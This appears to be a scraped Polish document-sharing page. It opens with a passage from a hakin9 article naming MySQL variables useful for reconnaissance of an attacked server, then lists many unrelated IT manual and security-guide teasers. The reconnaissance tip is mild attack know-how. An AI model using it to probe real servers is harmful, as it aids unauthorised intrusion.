operacyjnym. Zmienne, które mogą okazać się szczególnie przydatne podczas rekonesansu to: basedir katalog bazowy, datadir katalog przechowujący pliki baz danych, initfile ścieżka do pliku z poleceniami SQL, które zostaną wykonane podczas startu serwera, port numer portu na którym działa daemon MySQL, version wersja serwera, version _ compile _ machine architektura atakowanej maszyny, version _ compile _ os rodzaj systemu operacyjnego. Pełną listę zmiennych wraz z ich wartościami uzyskamy wydając polecenie: show variables, w programie mysql monitor. 20 hakin9 Nr 10/2007
Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework
Uniwersytet Zielonogórski Wydział Elektrotechniki, Informatyki i Telekomunikacji Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework mgr inż. Łukasz Stefanowicz dr inż.
Bardziej szczegółowo2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego
2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5
Bardziej szczegółowoWINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.
WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy
Bardziej szczegółowoProdukty. MKS Produkty
Produkty MKS Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE MKS Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych
Bardziej szczegółowoFiery Remote Scan. Uruchamianie programu Fiery Remote Scan. Skrzynki pocztowe
Fiery Remote Scan Program Fiery Remote Scan umożliwia zarządzanie skanowaniem na serwerze Fiery server i drukarce ze zdalnego komputera. Programu Fiery Remote Scan można użyć do wykonania następujących
Bardziej szczegółowoStrona wizytówka od 400 zł
Strona wizytówka od 400 zł Oferta z dnia 21.01.2010 Prosta strona zawierająca podstawowe informacje o firmie oraz jej ofercie. Pozwala ona klientom na odnalezienie firmy w sieci, zapoznanie się z jej ofertą,
Bardziej szczegółowoDokumentacja smsapi wersja 1.4
Dokumentacja smsapi wersja 1.4 1. Wprowadzenie Platforma smsapi została skierowana do użytkowników chcących rozbudować swoje aplikacje o system wysyłania smsów. Aplikacja ta w prosty sposób umożliwia integrację
Bardziej szczegółowoLogowanie do aplikacji TETA Web. Instrukcja Użytkownika
Logowanie do aplikacji TETA Web Instrukcja Użytkownika Spis treści 1 Wstęp... 2 1.1 O tym dokumencie... 2 1.2 Przyjęte oznaczenia... 2 1.3 Cel i zakres systemu... 2 1.4 Instalacja wtyczki Silverlight...
Bardziej szczegółowoOCHRONA PRZED RANSOMWARE. Konfiguracja ustawień
OCHRONA PRZED RANSOMWARE Konfiguracja ustawień SPIS TREŚCI: Wstęp...................... 3 Dlaczego warto korzystać z dodatkowych ustawień...... 3 Konfiguracja ustawień programów ESET dla biznesu......
Bardziej szczegółowoMemeo Instant Backup Podręcznik Szybkiego Startu
Wprowadzenie Memeo Instant Backup pozwala w łatwy sposób chronić dane przed zagrożeniami cyfrowego świata. Aplikacja regularnie i automatycznie tworzy kopie zapasowe ważnych plików znajdujących się na
Bardziej szczegółowoInstrukcja konfiguracji funkcji skanowania
Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji
Bardziej szczegółowoNr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08
Nr: 12 Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW Data modyfikacji: 2012-03-08 Co zawiera ten dokument: Ten dokument zawiera informacje o możliwościach i sposobie
Bardziej szczegółowoAutor: Joanna Karwowska
Autor: Joanna Karwowska Wygodniejszym i wydajniejszym sposobem przechowywania i korzystania z dużej ilości danych zapisanych na serwerze jest współpraca z relacyjną bazą danych. 2 1. Utworzyć bazę danych.
Bardziej szczegółowoPracownia internetowa w każdej szkole (edycja Jesień 2007)
Instrukcja numer D1/05_03/Z Pracownia internetowa w każdej szkole (edycja Jesień 2007) Opiekun pracowni internetowej cz. 1 Ręczne zakładanie kont użytkowników (D1) Jak ręcznie założyć konto w systemie
Bardziej szczegółowoDokumentacja systemu NTP rekrut. Autor: Sławomir Miller
Dokumentacja systemu NTP rekrut Autor: Sławomir Miller 1 Spis treści: 1. Wstęp 1.1 Wprowadzenie 1.2 Zakres dokumentu 2. Instalacja 2.1 Wymagania systemowe 2.2 Początek 2.3 Prawa dostępu 2.4 Etapy instalacji
Bardziej szczegółowoBGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21
BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21 BGK@24Biznes Dziękujemy Państwu za wybranie usługi bankowości elektronicznej Banku Gospodarstwa Krajowego BGK@24Biznes. Nasz system bankowości
Bardziej szczegółowosprawdzonych porad z bezpieczeństwa
65 sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa 65 sprawdzonych porad z bezpieczeństwa O niebezpieczeństwach czyhających na użytkowników
Bardziej szczegółowoCechy systemu X Window: otwartość niezależność od producentów i od sprzętu, dostępny kod źródłowy; architektura klient-serwer;
14.3. Podstawy obsługi X Window 14.3. Podstawy obsługi X Window W przeciwieństwie do systemów Windows system Linux nie jest systemem graficznym. W systemach Windows z rodziny NT powłokę systemową stanowi
Bardziej szczegółowoKancelaria Prawna.WEB - POMOC
Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV
Bardziej szczegółowoPodstawy technologii WWW
Podstawy technologii WWW Ćwiczenie 8 PHP, czyli poczatki nowej, dynamicznej znajomosci Na dzisiejszych zajęciach rozpoczniemy programowanie po stronie serwera w języku PHP. Po otrzymaniu żądania serwer
Bardziej szczegółowoZadanie 1 Treść zadania:
Zadanie 1 Treść zadania: 1 2 Komentarz do zadania: Ocenie podlegały następujące elementy projektu: 1. Tytuł pracy egzaminacyjnej. 2. Założenia do projektu. 3. Lista prawdopodobnych przyczyn usterki systemu
Bardziej szczegółowoJak używać funkcji prostego udostępniania plików do udostępniania plików w systemie Windows XP
Jak używać funkcji prostego udostępniania plików do udostępniania plików w systemie Windows XP System Windows XP umożliwia udostępnianie plików i dokumentów innym użytkownikom komputera oraz innym użytkownikom
Bardziej szczegółowo9.1.2. Ustawienia personalne
9.1.2. Ustawienia personalne 9.1. Konfigurowanie systemu Windows Systemy z rodziny Windows umożliwiają tzw. personalizację ustawień interfejsu graficznego poprzez dostosowanie wyglądu pulpitu, menu Start
Bardziej szczegółowoOprogramowanie antywirusowe avast! Free Antivirus 7.x + virus do testów
Oprogramowanie antywirusowe avast! Free Antivirus 7.x + virus do testów Jak zainstalować avast! Free Antivirus 7.x? Następujące wymagania systemowe są zalecane dla instalacji i uruchomienia na komputerze
Bardziej szczegółowoArcaVir 2008 System Protection
ArcaVir 2008 System Protection ARCAVIR 2008 SYSTEM PROTECTION to oprogramowanie typu Internet Security stanowiące pełne zabezpieczenie przed zagrożeniami z Internetu i sieci LAN. OCHRONA ANTYWIRUSOWA Silnik
Bardziej szczegółowoSTATISTICA 8 WERSJA JEDNOSTANOWISKOWA INSTRUKCJA INSTALACJI
STATISTICA 8 WERSJA JEDNOSTANOWISKOWA INSTRUKCJA INSTALACJI Uwagi: 1. Użytkownicy korzystający z systemów operacyjnych Windows 2000, XP lub Vista na swoich komputerach muszą zalogować się z uprawnieniami
Bardziej szczegółowoBaza danych do przechowywania użytkowników
System logowania i rejestracji jest bardzo przydatną funkcjonalnością na każdej stronie. Umożliwia sprawną identyfikację i zarządzanie użytkownikami. Strona ze skryptem logowania nabiera dużej wartości.
Bardziej szczegółowoInstrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/1.1.1/2015
Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/1.1.1/2015 INFORMACJE OGÓLNE 1. Wnioski o dofinansowanie projektu w ramach konkursu nr 1/1.1.1/2015
Bardziej szczegółowoZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja
ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.
Bardziej szczegółowoWykład 5: PHP: praca z bazą danych MySQL
Wykład 5: PHP: praca z bazą danych MySQL Architektura WWW Podstawowa: dwuwarstwowa - klient (przeglądarka) i serwer WWW Rozszerzona: trzywarstwowa - klient (przeglądarka), serwer WWW, serwer bazy danych
Bardziej szczegółowoPanel administracyjny serwera: admin.itl.pl
Panel administracyjny serwera: admin.itl.pl I. Ogólne dane serwera. 1. Aktualny stan serwera W Panelu Administracyjnym możesz na bieżąco monitorować stan swojego serwera. Opcja "Aktualny stan serwera"
Bardziej szczegółowoPodręcznik użytkownika
Podręcznik użytkownika Promocja wykorzystania biogazu w regionach Europy www.biogasaccepted.eu Studienzentrum für internationale Analysen 4553 Schlierbach/ Österreich Manual - Page 1/13 Contents Contents...2
Bardziej szczegółowoSSI Katalog. Program do katalogowania zawartości dysków. Dariusz Kalinowski
1.) Wymagania sprzętowe: SSI Katalog Program do katalogowania zawartości dysków Dariusz Kalinowski - System operacyjny: Windows 2000 lub Windows xp - Procesor minimum Pentium 1Ghz - Pamięć RAM minimum
Bardziej szczegółowoFirma Informatyczna ASDER. Prezentacja. Serwer danych lokalnych. Przemysław Kroczak ASDER 2012-08-06
2012 Firma Informatyczna ASDER Prezentacja Serwer danych lokalnych Przemysław Kroczak ASDER 2012-08-06 Szanowni Państwo, W dzisiejszej coraz częściej trzeba współdzielić pliki między pracownikami/działami
Bardziej szczegółowoMS Windows Vista. Spis treści. Autor: Jacek Parzonka, InsERT
MS Windows Vista Autor: Jacek Parzonka, InsERT Spis treści SPIS TREŚCI... 1 WSTĘP... 2 PROBLEMY... 2 UŻYWANIE AUTENTYKACJI WINDOWS DLA MS SQL SERVERA 2005 EXPRESS... 2 Run as administrator... 3 Modyfikacja
Bardziej szczegółowoObsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl
Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl Centrum Informatyki http://ci.ue.poznan.pl helpdesk@ue.poznan.pl al. Niepodległości 10, 61-875 Poznań tel. + 48 61 856 90 00 NIP: 777-00-05-497
Bardziej szczegółowoWin Admin Monitor Instrukcja Obsługi
Win Admin Monitor Instrukcja Obsługi czerwiec 2019 wersja dokumentu 1.7 dla wersji aplikacji 2.1.1.0 Spis treści: I. Wstęp 3 II. Wymagania systemowe 4 III. Ograniczenia funkcjonalne wersji demo 5 IV. Instalacja
Bardziej szczegółowoKonfiguracja poczty IMO dla urządzeń mobilnych z systemem ios oraz Android.
Konfiguracja poczty IMO dla urządzeń mobilnych z systemem ios oraz Android. Konfiguracja programu pocztowego dla urządzeń z systemem Android. W zależności od marki telefonu, użytej nakładki systemowej
Bardziej szczegółowoPracownia internetowa w szkole ZASTOSOWANIA
NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje
Bardziej szczegółowoSpis treści. Spis treści... 2. Wstęp... 3. Instalacja nazwa.pl... 3. Instalacja Home.pl... 8. Edycja grafiki strony... 17. logo...
Instalacja serwera Spis treści Spis treści... 2 Wstęp... 3 Instalacja nazwa.pl... 3 Instalacja Home.pl... 8 Edycja grafiki strony... 17 logo... 17 Wstęp Najnowszy sklep internetowy spod znaku sellsmart,
Bardziej szczegółowoPomoc dla http://host.nask.pl/ 31.12.2012 r.
Pomoc dla http://host.nask.pl/ 31.12.2012 r. Spis treści Kontakt... 2 Logowanie do konta pocztowego przez WWW... 3 Logowanie do panelu administracyjnego... 4 Konfiguracja klienta pocztowego... 7 Umieszczanie
Bardziej szczegółowowindows XP n a j l e p s z e t r i k i
windows XP n a j l e p s z e t r i k i windows XP n a j l e p s z e t r i k i Jak zoptymalizować pracę z systemem Windows XP?... 3 Jak szybko uruchamiać programy?... 3 W jaki sposób dostosować pulpit i
Bardziej szczegółowoSystem MWTB to program, który stwarza warunki do prezentacji Waszej firmy.
Witamy Państwa na Międzynarodowych Wirtualnych Targach Budownictwa zorganizowanych przez grupę specjalistów związanych z branżą budowlano informatyczną. Doceniając rangę internetu we współczesnym świecie,
Bardziej szczegółowoSystem komputerowy. Sprzęt. System komputerowy. Oprogramowanie
System komputerowy System komputerowy (ang. computer system) to układ współdziałaniadwóch składowych: sprzętu komputerowegooraz oprogramowania, działających coraz częściej również w ramach sieci komputerowej.
Bardziej szczegółowo5.4. Tworzymy formularze
5.4. Tworzymy formularze Zastosowanie formularzy Formularz to obiekt bazy danych, który daje możliwość tworzenia i modyfikacji danych w tabeli lub kwerendzie. Jego wielką zaletą jest umiejętność zautomatyzowania
Bardziej szczegółowoFAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen?
27.06.11 FAQ Systemu EKOS 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? Procedura rejestracji ocen wymaga podpisywania protokołów (w postaci wypełnionych formularzy InfoPath Forms
Bardziej szczegółowoOCHRONA PRZED RANSOMWARE
OCHRONA PRZED RANSOMWARE Konfiguracja ustawień Wprowadzanie zmian i proponowanych w niniejszym dokumencie polityk bezpieczeństwa polecamy wyłącznie administratorom, posiadającym szczegółową wiedzę nt swojej
Bardziej szczegółowoProdukty. ESET Produkty
Produkty ESET Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE ESET Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych
Bardziej szczegółowoPORADNIK Zasady i zalecenia pracy z plikami oraz tekstem na stronach nowego portalu SGH (na platformie SharePoint)
PORADNIK Zasady i zalecenia pracy z plikami oraz tekstem na stronach nowego portalu SGH (na platformie SharePoint) wersja 2.0. (6 listopada 2015 r.) Przygotowanie: Dział Informacji i Komunikacji, Dział
Bardziej szczegółowoInstrukcja. Rejestracji i aktywacji konta w systemie so-open.pl DOTACJE NA INNOWACJE; SOFTWARE OPERATIONS SP. Z O. O.
Instrukcja Rejestracji i aktywacji konta w systemie so-open.pl 1Strona 1 z 12 Spis treści Wstęp... 3 Rejestracja... 3 Aktywacja konta... 5 Rozpoczęcie pracy z systemem... 7 Pierwsze logowanie do systemu...
Bardziej szczegółowoFacebook, Nasza klasa i inne. www.facebook.com. podstawowe informacje o serwisach społeczności internetowych. Cz. 2. Facebook
Facebook, Nasza klasa i inne podstawowe informacje o serwisach społeczności internetowych Cz. 2. Facebook www.facebook.com Facebook to drugi najczęściej wykorzystywany portal społecznościowy w Polsce i
Bardziej szczegółowoProjektowani Systemów Inf.
Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych
Bardziej szczegółowoOPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego
ZADANIE V OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego A. ROZMIARY I CHARAKTER ZADANIA 1. W ramach dostawy oprogramowania antywirusowego Szpital
Bardziej szczegółowoPROBLEMY TECHNICZNE. Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS
PROBLEMY TECHNICZNE Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS Jeżeli stwierdziłeś występowanie błędów lub problemów podczas pracy z programem DYSONANS możesz skorzystać
Bardziej szczegółowoProjektowanie baz danych za pomocą narzędzi CASE
Projektowanie baz danych za pomocą narzędzi CASE Metody tworzenia systemów informatycznych w tym, także rozbudowanych baz danych są komputerowo wspomagane przez narzędzia CASE (ang. Computer Aided Software
Bardziej szczegółowoTemat: Windows 7 Centrum akcji program antywirusowy
Instrukcja krok po kroku Centrum akcji program antywirusowy. Strona 1 z 9 Temat: Windows 7 Centrum akcji program antywirusowy Logowanie do konta lokalnego Administrator Start Panel sterowania Widok według:
Bardziej szczegółowoInstalacja systemu zarządzania treścią (CMS): Joomla
Instalacja systemu zarządzania treścią (CMS): Joomla Na stronie http://www.cba.pl/ zarejestruj nowe konto klikając na przycisk:, następnie wybierz nazwę domeny (Rys. 1a) oraz wypełnij obowiązkowe pola
Bardziej szczegółowoIntegracja sklepu internetowego z serwisem aukcyjnym Swistak.pl
Integracja sklepu internetowego z serwisem aukcyjnym Swistak.pl email: swistak@swistak.pl Spis treści 1. Wstęp...2 2. Import oferty...2 3. Plik CSV...3 4. Przykład pliku...7 5. Aktualizacja oferty...7
Bardziej szczegółowoINSTRUKCJA INSTALACJI
INSTRUKCJA INSTALACJI TcpMDT ver. 7 Aplitop, 2014 C/ Sumatra, 9 E-29190 MÁLAGA (SPAIN) web: www.aplitop.com e-mail: support@aplitop.com Spis treści Instalacja MDT ver. 7... 3 Wymagania systemowe... 3 Menu
Bardziej szczegółowoInstalacja oprogramowania Rigel Med-eBase dla systemów Windows XP, 7 oraz 8.
Nota Aplikacyjna 0037 Instalacja oprogramowania Rigel Med-eBase dla systemów Windows XP, 7 oraz 8. W celu instalacji oprogramowania Rigel Med-eBase należy spełnić minimalne wymagania sprzętowe opisane
Bardziej szczegółowoProgram PortaScan wersja 1.0.3. Instrukcja obsługi
Porta KMI Poland Sp. z o.o. Bolszewo, ul. Szkolna 26 Program PortaScan wersja 1.0.3 Instrukcja obsługi Wykonano: Dział IT Porta KMI Poland Sp. z o.o. Program PortaScan wersja 1.0.3. Instrukcja instalacji
Bardziej szczegółowoĆwiczenia laboratoryjne nr 11 Bazy danych i SQL.
Prezentacja Danych i Multimedia II r Socjologia Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Celem ćwiczeń jest poznanie zasad tworzenia baz danych i zastosowania komend SQL. Ćwiczenie I. Logowanie
Bardziej szczegółowoArtPlayer oprogramowanie do odtwarzania plików video sterowane Artnet/DMX V1.0.1
Instrukcja obsługi ArtPlayer oprogramowanie do odtwarzania plików video sterowane Artnet/DMX V1.0.1 1 ArtPlayer to proste oprogramowanie umożliwiające odtwarzanie plików video i ich wybór poprzez protokół
Bardziej szczegółowoWorld Wide Web? rkijanka
World Wide Web? rkijanka World Wide Web? globalny, interaktywny, dynamiczny, wieloplatformowy, rozproszony, graficzny, hipertekstowy - system informacyjny, działający na bazie Internetu. 1.Sieć WWW jest
Bardziej szczegółowoClient-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl
Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne
Bardziej szczegółowoTechnologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny
Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny AiRIII gr. 2TI sekcja 1 Autorzy: Tomasz Bizon Józef Wawrzyczek 2 1. Wstęp Celem projektu było stworzenie sklepu
Bardziej szczegółowo4. Podstawowa konfiguracja
4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić
Bardziej szczegółowo5. Praca z klasą. Dodawanie materiałów i plików. Etykieta tematu. Rozdział 5 Praca z klasą
5. Praca z klasą Jako prowadzący i nauczyciel mamy bardzo duże możliwości, jeżeli chodzi o zamieszczanie i korzystanie z materiałów na platformie e-learningowej. Wykładowca w pierwszej kolejności musi
Bardziej szczegółowoCurrenda EPO Instrukcja Konfiguracji. Wersja dokumentu: 1.3
Currenda EPO Instrukcja Konfiguracji Wersja dokumentu: 1.3 Currenda EPO Instrukcja Konfiguracji - wersja dokumentu 1.3-19.08.2014 Spis treści 1 Wstęp... 4 1.1 Cel dokumentu... 4 1.2 Powiązane dokumenty...
Bardziej szczegółowoinstrukcja INSTALACJI www.piersa.pl APi_proxy
instrukcja INSTALACJI 1 1. Instalacja Proces instalacji jest prosty wgrywamy pliki na serwer nadajemy prawa chmod 777 lub 755 dla katalogu w którym znajduje się aplikacja przeważnie będzie to katalog public_html
Bardziej szczegółowoInstrukcja użytkownika
Instrukcja użytkownika ul. Zawalna 1/5 51-118 Wrocław e-mail: biuro@innotechtion.pl www.innotechtion.pl Spis treści 1 Instalacja oprogramowania SMS Studio...2 2 Pierwsze uruchomienie... 4 2.1 Rejestracja...
Bardziej szczegółowoĆw. I. Środowisko sieciowe, połączenie internetowe, opcje internetowe
Ćw. I. Środowisko sieciowe, połączenie internetowe, opcje internetowe 1) Znajdowanie komputerów podłączonych do sieci lokalnej. Z menu Start bądź z Pulpitu wybierz opcję Moje miejsca sieciowe. Z dostępnych
Bardziej szczegółowoSzkolenie z użytkowania platformy ONLINE.WSNS
WYŻSZA SZKOŁA NAUK SPOŁECZNYCH z siedzibą w Lublinie PLATFORMA E-LEARNING Szkolenie z użytkowania platformy ONLINE.WSNS Lublin, 2011 admin@wsns.pl 2011 Wyższa Szkoła Nauk Społecznych http://www.wsns.pl
Bardziej szczegółowoInstrukcje ustawień funkcji zwalniania wydruku
Instrukcje ustawień funkcji zwalniania wydruku SPIS TREŚCI O INSTRUKCJI........................................................................................ 2 FUNKCJA ZWALNIANIA WYDRUKU......................................................................
Bardziej szczegółowoPLAN WYNIKOWY PROGRAMOWANIE APLIKACJI INTERNETOWYCH. KL IV TI 6 godziny tygodniowo (6x15 tygodni =90 godzin ),
PLAN WYNIKOWY PROGRAMOWANIE APLIKACJI INTERNETOWYCH KL IV TI 6 godziny tygodniowo (6x15 tygodni =90 godzin ), Program 351203 Opracowanie: Grzegorz Majda Tematyka zajęć 2. Przygotowanie środowiska pracy
Bardziej szczegółowoOMNITRACKER Wersja testowa. Szybki przewodnik instalacji
OMNITRACKER Wersja testowa Szybki przewodnik instalacji 1 Krok 1:Rejestracja pobrania (jeżeli nie wykonana dotychczas) Proszę dokonać rejestracji na stronieomninet (www.omnitracker.com) pod Contact. Po
Bardziej szczegółowoPrzewodnik Szybki start
Przewodnik Szybki start Program Microsoft Access 2013 wygląda inaczej niż wcześniejsze wersje, dlatego przygotowaliśmy ten przewodnik, aby skrócić czas nauki jego obsługi. Zmienianie rozmiaru ekranu lub
Bardziej szczegółowoSystem kontroli dostępu ACCO NET Instrukcja instalacji
System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166
Bardziej szczegółowoPomoc systemu poczty elektronicznej Wydziału Humanistycznego Uniwersytetu Szczecińskiego. Wersja: 1.12
Pomoc systemu poczty elektronicznej Wydziału Humanistycznego Uniwersytetu Szczecińskiego Wersja: 1.12 Instrukcja samodzielnej rejestracji konta poczty elektronicznej w domenie whus.pl Przejdź Instrukcja
Bardziej szczegółowoInstalacja Webroot SecureAnywhere przy użyciu GPO w Active Directory
Instalacja Webroot SecureAnywhere przy użyciu GPO w Active Directory Poniższa instrukcja opisuje sposób zdalnej instalacji oprogramowania Webroot SecureAnywhere w środowiskach wykorzystujących usługę Active
Bardziej szczegółowoSQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE..
SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE.. Cel prezentacji Spojrzymy na dane i serwery SQL z perspektywy cyberprzestępcy, omówimy
Bardziej szczegółowoTechnologia Automatyczne zapobieganie exploitom
Technologia Automatyczne zapobieganie exploitom Podejście Kaspersky Lab do bezpieczeństwa opiera się na ochronie wielowarstwowej. Większość szkodliwych programów powstrzymuje pierwsza warstwa zostają np.
Bardziej szczegółowoSPOSOBY DYSTRYBUCJI OPROGRAMOWANIA PANDA
SPOSOBY DYSTRYBUCJI OPROGRAMOWANIA PANDA Panda Security oferuje trzy sposoby dystrybucji oprogramowania na stacje końcowe: - Lokalne pobranie pliku instalacyjnego z portalu zarządzającego - Generacja instalacyjnego
Bardziej szczegółowoI. Informacje ogólne. Jednym z takich systemów jest Mambo.
MAMBO (CMS) I. Informacje ogólne CMS, Content Management System ("system zarządzania treścią") jest to jedna lub zestaw aplikacji internetowych pozwalających na łatwe utworzenie oraz późniejszą aktualizację
Bardziej szczegółowo[1/15] Chmury w Internecie. Wady i zalety przechowywania plików w chmurze
Chmury w Internecie Nota Materiał powstał w ramach realizacji projektu e-kompetencje bez barier dofinansowanego z Programu Operacyjnego Polska Cyfrowa działanie 3.1 Działania szkoleniowe na rzecz rozwoju
Bardziej szczegółowoHosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas)
Hosting WWW Bezpieczeństwo hostingu WWW Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Najgroźniejsze ataki na serwer WWW Najgroźniejsze ataki na serwer WWW Cross-site scripting (XSS) SQL injection Denial
Bardziej szczegółowoABC systemu Windows 2016 PL / Danuta Mendrala, Marcin Szeliga. Gliwice, cop Spis treści
ABC systemu Windows 2016 PL / Danuta Mendrala, Marcin Szeliga. Gliwice, cop. 2016 Spis treści Wstęp 9 1 Instalacja i aktualizacja systemu 13 Przygotowanie do instalacji 14 Wymagania sprzętowe 14 Wybór
Bardziej szczegółowoRozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione.
Rozdział 6 - Z kim się kontaktować - 199 - Spis treści - 200 - Rozdział 6 - Z kim się kontaktować Spis treści Rozdział 1: Podstawy bezpiecznego użytkowania komputera... - 3 - Dlaczego należy aktualizować
Bardziej szczegółowoPHP: bazy danych, SQL, AJAX i JSON
1 PHP: bazy danych, SQL, AJAX i JSON SYSTEMY SIECIOWE Michał Simiński 2 Bazy danych Co to jest MySQL? Jak się połączyć z bazą danych MySQL? Podstawowe operacje na bazie danych Kilka dodatkowych operacji
Bardziej szczegółowoRejestratory Trend szybka konfiguracja do obsługi przez sieć.
Rejestratory Trend szybka konfiguracja do obsługi przez sieć. Rejestratory TREND serii 250 zarządzane mogą być nie tylko lokalnie, ale także zdalnie, przez sieć Internet. Aby połączenie działało prawidłowo
Bardziej szczegółowoActiveXperts SMS Messaging Server
ActiveXperts SMS Messaging Server ActiveXperts SMS Messaging Server to oprogramowanie typu framework dedykowane wysyłaniu, odbieraniu oraz przetwarzaniu wiadomości SMS i e-mail, a także tworzeniu własnych
Bardziej szczegółowoSERWER AKTUALIZACJI UpServ
Wersja 1.12 upserv_pl 11/16 SERWER AKTUALIZACJI UpServ SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166 075 www.satel.pl SATEL
Bardziej szczegółowoWindows Serwer 2008 R2. Moduł x. IIS
Windows Serwer 2008 R2 Moduł x. IIS Internet Information Services IIS (ang. Internet Information Services) jest zbiorem usług internetowych dla systemów rodziny Microsoft Windows. Obecnie pełni funkcje
Bardziej szczegółowoPolityka cookies w serwisie internetowym
Polityka cookies w serwisie internetowym www.bacca.pl Bacca dokłada wszelkich starań, aby Serwis był wygodny w użyciu. Dla poprawy wygody korzystania z Serwisu korzystamy z plików cookie. Za pomocą technologii
Bardziej szczegółowoWymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk:
Nr Sprawy KP- 42 /2006 Załącznik nr 1 Do Specyfikacji Istotnych Warunków Zamówienia Wymagania techniczne dla programów antywirusowych Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość
Bardziej szczegółowoPanel Administracyjny Spis treści:
Panel Administracyjny Spis treści: 1. Wstęp - ogólne informacje dot. panelu Moje-Serwery.pl 2. Rejestracja konta w serwisie Moje-Serwery.pl i logowanie. 3. Dane konta - ustawienia konta użytkownika. 4.
Bardziej szczegółowoStawiamy pierwsze kroki
Stawiamy pierwsze kroki 3.1. Stawiamy pierwsze kroki Edytory tekstu to najbardziej popularna odmiana programów służących do wprowadzania i zmieniania (czyli edytowania) tekstów. Zalicza się je do programów
Bardziej szczegółowoZagrożenia związane z udostępnianiem aplikacji w sieci Internet
Zagrożenia związane z udostępnianiem aplikacji w sieci Internet I Ogólnopolska Konferencja Informatyki Śledczej Katowice, 8-9 stycznia 2009 Michał Kurek, Aleksander Ludynia Cel prezentacji Wskazanie skali
